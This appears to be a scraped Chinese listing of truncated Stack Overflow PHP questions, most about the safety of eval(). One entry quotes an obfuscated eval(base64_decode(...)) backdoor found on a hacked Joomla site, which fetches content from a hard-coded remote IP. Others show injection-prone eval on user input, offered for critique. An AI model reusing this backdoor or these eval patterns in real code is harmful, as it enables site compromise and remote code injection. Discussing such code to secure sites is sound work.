eval_model_params

php - Laravel - 带有 blade compileString 的 php eval

我正在尝试将Blade模板字符串解析为php格式，并使用eval()将字符串作为php代码求值$array=['foo'=>'bar','bar'=>'foo'];$content='@foreach($arrayas$value){{$value}}@endforeach';$blade=Blade::compileString($content);$php=eval($blade);这是我到目前为止的测试代码，它抛出异常ParseError:syntaxerror,unexpected'$blade在compileString()之后的值addLoop($__currentLoop

PHP - session_set_cookie_params 和 session_get_cookie_params

我正在进一步研究session并希望获得一些意见。提交表单后，在一个简单的登录表单上，我有以下内容......session_name('TOKEN');session_set_cookie_params(time()+600,'./','example.co.uk',false,false);session_start();$_SESSION['TOKEN']=TOKEN;......然后当向服务器发出请求时，我就有了这个。......session_name('TOKEN');$session_data=session_get_cookie_params();print_r($se

session cookie section session_set_cookie_params php

php - 如何在 php 中安全地使用 eval？

我知道只要有用户输入，有些人可能只会回答“从不”。但是假设我有这样的东西:$version=$_REQUEST['version'];$test='return$version>3;';$success=eval($test);这显然是一个简化的案例，但是用户可以输入什么作为version来让它做一些恶意的事情吗？如果我限制$test可以采用的字符串类型来将某些变量的值与其他变量进行比较，有没有任何人可以看到利用它的方法？编辑我已尝试在服务器上运行以下脚本，但没有任何反应:3;';$result=eval('return'.$teststr);var_dump($result);?>我

何在 php code section version eval

php - 从 Mage_Sales_Model_Order_Invoice 对象获取发票 ID

我正在为sales_order_invoice_register事件编写一个观察器，我想获取刚刚保存的发票编号。我找不到检索该ID的函数，这些评论的调用都不起作用。任何的想法？代码在这里publicfunctionfoobar($observer){$order=$observer->getEvent()->getOrder();$id_order=$order->getRealOrderId();$id_invoice=$observer->getEvent()->getInvoice();//theMage_Sales_Model_Order_Invoiceobject//$id_

Mage_Sales_Model_Order_Invoice Invoice id_invoice section php magento observer-pattern

php - zend_call_method_with_N_params

PHP扩展开发有zend_call_method_with_0_params、zend_call_method_with_1_params和zend_call_method_with_2_params。但是如何调用超过2个参数的方法呢？最佳答案我之前的回答是错误的。你必须使用zend_call_functiondirectly.查看正文zend_call_method.基本上你必须准备一个zend_fcall_info先对象。参数数量应存储在fci.param_count中领域和fci.params应该有一个数组fci.para

zend_call_method_with_N_params method code section zend php c php-extension zend-framework

PHP EVAL - 解决不安全问题

我们有一个系统必须执行用户输入提供的计算。我发现进行其中一种计算的最简单方法是eval——尝试找出一个解析器用于:(3+6)/2+27*5/2只是看起来很难。如果有人对此有解决方案-我很乐意听到。假设您要使用EVAL(我知道它的可怕功能)，允许他们在该框中键入他们想要的任何内容将是一个主要的不安全因素。所以，我提出这个问题，如果我做一个正则表达式，删除除数字、标准运算符(+-/*)和括号之外的所有内容，比如$equation=preg_replace('/[^0-9+-\/*()]/','',$input_equation);$result=eval($equation);系统是否可能

决不 EVAL 39 code string php

php - 这样使用 eval 安全吗？

假设我有一个名为query.sql的文件，其中包含以下内容:SELECT*FROM`users`WHERE`id`!=".$q->Num($_POST['id'])."在我的php脚本中，它有一个带有名为“id”的输入的html表单，我做了以下技巧:$sql=file_get_contents('query.sql');$query=eval("return\"$sql\";");//herefollowssomethinglike$mysqli->query($query);andsoon..我不关心SQL注入(inject)，因为我使用的是准备好的语句并且$q->Num执行is_i

eval php code strong section security

php - 网站后门 & eval()

关闭。这个问题是off-topic.它目前不接受答案。想改进这个问题吗？Updatethequestion所以它是on-topic用于堆栈溢出。关闭9年前。Improvethisquestion我运行的Joomla1.7网站今天被黑了。下面的脚本进行了破解。eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU

amp eval section noreferrer noopener php joomla joomla1.7

php - 安全地使用 php : modifying user input to avoid security issues 中的 eval 函数

我正在接管一些使用eval()的网页游戏代码php中的函数我知道这可能是一个严重的安全问题，所以我希望在决定是否取消该部分代码之前帮助审查检查其参数的代码。目前我已经从游戏中删除了这部分代码，直到我确定它是安全的，但功能损失并不理想。我宁愿对此进行安全验证，也不愿重新设计整个段以避免使用eval()，假设这样的事情是可能的。据称可以防止恶意代码注入(inject)的相关代码片段如下。$value是一个用户输入的字符串，我们知道它不包含“;”。1$value=eregi_replace("[\t\r]","",$value);2$value=addslashes($value);3$va

php modifying code value section security eval

php - 将模型名称作为函数中的参数传递并使用其方法，如 "$this-> $model_name->method()"codeigniter

我如何创建一个方法来用特定模型填充读取特定表格的下拉列表，然后获取该表格的特定列来填充下拉列表？例如，如果我有一个模范人物我有functionget_all_id($id,$table){$this->db->from($table);$this->db->order_by($id,"asc");$q=$this->db->get();return$q;}然后，如果我需要填写一个带有姓氏字段的下拉列表...我会将其用作$this->load->model('person_model');$row=$this->person_model->get_all_id('id_person','

amp codeigniter gt name model php code-injection

36 37 383940 41 42